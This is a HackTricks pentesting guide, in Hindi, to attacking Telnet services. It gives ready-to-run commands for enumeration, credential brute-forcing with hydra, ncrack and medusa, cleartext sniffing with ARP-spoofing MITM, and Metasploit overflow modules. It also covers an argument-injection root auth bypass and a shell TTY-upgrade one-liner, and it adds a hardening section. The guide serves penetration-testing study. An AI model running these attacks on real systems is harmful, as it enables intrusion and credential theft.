23 - Pentesting Telnet

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

बुनियादी जानकारी

Telnet एक नेटवर्क प्रोटोकॉल है जो उपयोगकर्ताओं को नेटवर्क के माध्यम से कंप्यूटर तक पहुँचने का एक असुरक्षित तरीका देता है।

डिफ़ॉल्ट पोर्ट: 23

23/tcp open  telnet

एन्यूमरेशन

nc -vn <IP> 23

सारी रोचक enumeration nmap द्वारा की जा सकती है:

nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>

स्क्रिप्ट telnet-ntlm-info.nse NTLM जानकारी (Windows संस्करण) प्राप्त करेगी।

From the telnet RFC: TELNET Protocol में कई “options” होते हैं जिन्हें स्वीकृत किया जा सकता है और जिन्हें “DO, DON’T, WILL, WON’T” संरचना के साथ उपयोग किया जा सकता है ताकि उपयोगकर्ता और सर्वर अपने TELNET कनेक्शन के लिए एक अधिक विस्तृत (या शायद बस अलग) सेट कन्वेंशन्स उपयोग करने पर सहमत हो सकें। ऐसे options में character set बदलना, echo mode बदलना, आदि शामिल हो सकते हैं।

मुझे पता है कि इन options को enumerate करना संभव है लेकिन मुझे तरीका नहीं पता — अगर आप जानते हों तो बताइए।

Telnet Options / Features सूचीबद्ध करना

Telnet विकल्प सक्षम करने के लिए IAC + DO/DONT/WILL/WONT बातचीत का उपयोग करता है। आप प्रारंभिक negotiation को कैप्चर करके और विशिष्ट फीचर्स के लिए probing करके समर्थित options का निरीक्षण कर सकते हैं।

Nmap option/feature probes

# Detect support for the Telnet ENCRYPT option
nmap -p 23 --script telnet-encryption <IP>

# Enumerate Microsoft Telnet NTLM info (NetBIOS/DNS/OS build)
nmap -p 23 --script telnet-ntlm-info <IP>

# Brute-force via NSE (alternative to Hydra/Medusa)
nmap -p 23 --script telnet-brute --script-args userdb=users.txt,passdb=pass.txt <IP>

telnet-encryption स्क्रिप्ट यह जांचती है कि ENCRYPT विकल्प समर्थित है या नहीं; कुछ कार्यान्वयन ऐतिहासिक रूप से इस विकल्प को गलत तरीके से संभालते थे और उनमें भेद्यता थी, लेकिन स्क्रिप्ट केवल समर्थन की जाँच करती है। telnet-ntlm-info Microsoft Telnet NTLM सक्षम होने पर NTLM metadata (NetBIOS/DNS/OS build) प्रकट करता है। telnet-brute Telnet के लिए एक NSE brute-force ऑडिटर है।

Brute force

कॉन्फ़िग फ़ाइल

/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet

HackTricks स्वचालित कमांड्स

Protocol_Name: Telnet    #Protocol Abbreviation if there is one.
Port_Number:  23     #Comma separated if there is more than one.
Protocol_Description: Telnet          #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for t=Telnet
Note: |
wireshark to hear creds being passed
tcp.port == 23 and ip.addr != myip

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-telnet.html

Entry_2:
Name: Banner Grab
Description: Grab Telnet Banner
Command: nc -vn {IP} 23

Entry_3:
Name: Nmap with scripts
Description: Run nmap scripts for telnet
Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}

Entry_4:
Name: consoleless mfs enumeration
Description: Telnet enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'

Recent Vulnerabilities (2022-2026)

  • CVE-2024-45698 – D-Link Wi-Fi 6 routers (DIR-X4860): telnet सेवा में अनुचित इनपुट वैलिडेशन के कारण रिमोट हमलावर hard-coded credentials का उपयोग कर लॉगिन कर सकते हैं और OS commands inject कर सकते हैं; फिक्स firmware 1.04B05 या बाद में उपलब्ध है।
  • CVE-2023-40478 – NETGEAR RAX30: Telnet CLI passwd कमांड में stack-based buffer overflow से network-adjacent code execution as root संभव होता है; authentication आवश्यक है पर बाईपास किया जा सकता है।
  • CVE-2022-39028 – GNU inetutils telnetd: एक two-byte sequence (0xff 0xf7 / 0xff 0xf8) telnetd में NULL-pointer dereference ट्रिगर कर सकती है, और बार-बार क्रैश होने पर inetd सेवा को disable कर सकता है (DoS)।

इन CVEs को vulnerability triage के दौरान ध्यान में रखें—यदि लक्ष्य un-patched firmware या legacy inetutils Telnet daemon चला रहा है तो आपके पास सीधे code-execution या disruptive DoS का रास्ता हो सकता है।

CVE-2026-24061 — GNU Inetutils telnetd auth bypass (Critical)

Summary: GNU Inetutils के telnetd (<= 2.7) में USER environment variable की value -f root के माध्यम से remote authentication bypass संभव है, जिसके परिणामस्वरूप unauthenticated root access मिल सकता है।
Root cause: argument injection (CWE-88) — telnetd क्लाइंट-सप्लायड USER environment variable को बिना sanitization किए login को forward करता है।
Scope: GNU Inetutils telnetd versions 1.9.3–2.7 प्रभावित हैं (प्रकाशित January 21, 2026)।

Mitigations

  • Patch/upgrade प्रभावित packages तुरंत (उदा., Debian fixes 2:2.4-2+deb12u2, 2:2.6-3+deb13u1, और 2:2.7-2 में हैं)।
  • Disable Telnet या patching के दौरान access को trusted management networks तक सीमित करें।

Sniffing Credentials & Man-in-the-Middle

Telnet सब कुछ, जिसमें credentials भी शामिल हैं, clear-text में ट्रांसमिट करता है। उन्हें capture करने के दो तेज़ तरीके:

# Live capture with tcpdump (print ASCII)
sudo tcpdump -i eth0 -A 'tcp port 23 and not src host $(hostname -I | cut -d" " -f1)'

# Wireshark display filter
tcp.port == 23 && (telnet.data || telnet.option)

सक्रिय MITM के लिए, ARP spoofing (e.g. arpspoof/ettercap) को उन्हीं sniffing filters के साथ मिलाएँ ताकि switched networks पर passwords harvest किए जा सकें।

Automated Brute-force / Password Spraying

# Hydra (stop at first valid login)
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>

# Ncrack (drop to interactive session on success)
ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP>

# Medusa (parallel hosts)
medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f

Most IoT botnets (Mirai variants) अभी भी port 23 को छोटे default-credential dictionaries के साथ स्कैन करते हैं—इसी लॉजिक को अपनाकर जल्दी से कमजोर डिवाइस पहचाने जा सकते हैं।

Exploitation & Post-Exploitation

Metasploit के पास कई उपयोगी मॉड्यूल हैं:

  • auxiliary/scanner/telnet/telnet_version – बैनर & option enumeration.
  • auxiliary/scanner/telnet/brute_telnet – multithreaded bruteforce.
  • auxiliary/scanner/telnet/telnet_encrypt_overflow – RCE against vulnerable Solaris 9/10 Telnet (option ENCRYPT handling).
  • exploit/linux/mips/netgear_telnetenable – कई NETGEAR राउटरों पर crafted packet के साथ telnet service सक्षम करता है।

After a shell is obtained remember that TTYs are usually dumb; अपग्रेड करने के लिए python -c 'import pty;pty.spawn("/bin/bash")' चलाएं या HackTricks TTY tricks का उपयोग करें।

Hardening & Detection (Blue team corner)

  1. SSH को प्राथमिकता दें और Telnet service को पूरी तरह निष्क्रिय कर दें।
  2. यदि Telnet आवश्यक है, तो इसे केवल management VLANs पर ही bind करें, ACLs लागू करें और daemon को TCP wrappers (/etc/hosts.allow) से रैप करें।
  3. legacy telnetd implementations को ssl-telnet या telnetd-ssl से बदलें ताकि transport encryption जुड़ सके, परन्तु यह केवल data-in-transit की रक्षा करता है—password-guessing फिर भी trivial रहता है
  4. port 23 की ओर outbound ट्रैफ़िक पर निगरानी रखें; compromises अक्सर Telnet के ऊपर reverse shells बनाते हैं ताकि strict-HTTP egress filters को bypass किया जा सके।

References

  • D-Link Advisory – CVE-2024-45698 Critical Telnet RCE.
  • NVD – CVE-2022-39028 inetutils telnetd DoS.
  • NVD – CVE-2026-24061.
  • Canadian Centre for Cyber Security Alert AL26-002 (CVE-2026-24061).
  • Debian Security Tracker – CVE-2026-24061 fixed versions.

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें